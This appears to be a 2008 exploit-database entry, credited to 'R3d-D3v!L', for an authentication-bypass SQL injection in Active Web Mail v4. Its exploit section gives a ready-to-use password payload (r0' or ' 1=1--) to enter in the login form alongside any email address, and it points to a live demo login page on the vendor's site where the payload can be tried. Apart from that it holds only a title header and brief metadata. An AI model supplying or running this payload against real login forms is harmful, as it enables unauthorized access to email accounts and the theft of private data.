id: 4303
date: 11/29/2008
title: Active Web Mail v 4 (Auth Bypass) Remote SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

====================================================================
Active Web Mail v 4 (Auth Bypass) Remote SQL Injection Vulnerability
====================================================================


 [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~]Vendor: www.activewebsoftwares.com
   
 [~]Software: Active Web Mail v 4
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~] -----------------------------------------------------------
   
   
 [~] Exploit:
   
  Email: any mail

  password: r0' or ' 1=1--
   
   
 [~]login 4 d3m0:
   
  www.activewebsoftwares.com/DemoActiveWebmail/login.aspx


 
 [~]--------------------------------------------------------------------------------
 



#  0day.today [2023-03-26]  #